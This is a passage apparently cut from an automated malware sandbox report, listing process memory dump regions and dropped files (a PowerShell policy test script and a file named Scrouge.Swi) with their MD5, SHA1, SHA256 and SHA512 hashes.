| SHA512 | 135228bbf7cea08b76bc288335e1699828a642cd6b81761bba33ed5a40c28632b25cf8f8664fbf4ee2d21b573d1cda066614250054002c8bf4bda869389d03a6 |
memory/4612-322-0x00007FFD774B3000-0x00007FFD774B5000-memory.dmp
memory/4612-323-0x0000020054C00000-0x0000020054C22000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kumzcvv2.0vw.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4612-333-0x00007FFD774B0000-0x00007FFD77F71000-memory.dmp
memory/4612-334-0x00007FFD774B0000-0x00007FFD77F71000-memory.dmp
memory/4612-335-0x00007FFD774B0000-0x00007FFD77F71000-memory.dmp
memory/3632-338-0x000000007531E000-0x000000007531F000-memory.dmp
memory/3632-339-0x00000000051E0000-0x0000000005216000-memory.dmp
memory/3632-340-0x0000000075310000-0x0000000075AC0000-memory.dmp
memory/3632-341-0x0000000075310000-0x0000000075AC0000-memory.dmp
memory/3632-342-0x00000000059B0000-0x0000000005FD8000-memory.dmp
memory/3632-343-0x0000000005800000-0x0000000005822000-memory.dmp
memory/3632-344-0x0000000005FE0000-0x0000000006046000-memory.dmp
memory/3632-345-0x0000000006160000-0x00000000061C6000-memory.dmp
memory/3632-351-0x00000000061D0000-0x0000000006524000-memory.dmp
memory/4612-356-0x00007FFD774B3000-0x00007FFD774B5000-memory.dmp
memory/4612-357-0x00007FFD774B0000-0x00007FFD77F71000-memory.dmp
memory/3632-358-0x0000000006700000-0x000000000671E000-memory.dmp
memory/3632-359-0x00000000067D0000-0x000000000681C000-memory.dmp
memory/4612-360-0x00007FFD774B0000-0x00007FFD77F71000-memory.dmp
memory/3632-361-0x0000000008220000-0x000000000889A000-memory.dmp
memory/3632-362-0x0000000006B90000-0x0000000006BAA000-memory.dmp
memory/3632-363-0x0000000007BA0000-0x0000000007C36000-memory.dmp
memory/3632-364-0x00000000078B0000-0x00000000078D2000-memory.dmp
memory/3632-365-0x00000000088A0000-0x0000000008E44000-memory.dmp
C:\Users\Admin\AppData\Roaming\Scrouge.Swi
| MD5 | be60fe46432e08e827aeefd9f72d5790 |
| SHA1 | 7322ebc77810e84976136174258dddde78a23f27 |
| SHA256 | 8722cb6fe1e75ddcd9127b92f438e2b0155eab29cc29270ca7aa35be9edff7b4 |
| SHA512 | 72a7e93c1c1d78260ec1ac1438450baf4d6f21a1299824878e405a115c8318796d7bf233db80d42f8d66ab1c73531741965fbf1e9679a1fb2071bab9d8b9e913 |
memory/3632-367-0x000000007531E000-0x000000007531F000-memory.dmp
memory/3632-368-0x0000000075310000-0x0000000075AC0000-memory.dmp
memory/3632-369-0x0000000008E50000-0x000000000EAA9000-memory.dmp
memory/3632-371-0x0000000075310000-0x0000000075AC0000-memory.dmp
memory/3632-385-0x0000000075310000-0x0000000075AC0000-memory.dmp
memory/2992-384-0x0000000000FF0000-0x0000000002244000-memory.dmp
memory/2992-386-0x0000000000FF0000-0x0000000001032000-memory.dmp
memory/4612-389-0x00007FFD774B0000-0x00007FFD77F71000-memory.dmp
memory/2992-391-0x0000000025920000-0x0000000025970000-memory.dmp
memory/2992-392-0x0000000025FF0000-0x0000000026082000-memory.dmp
memory/2992-393-0x0000000025970000-0x000000002597A000-memory.dmp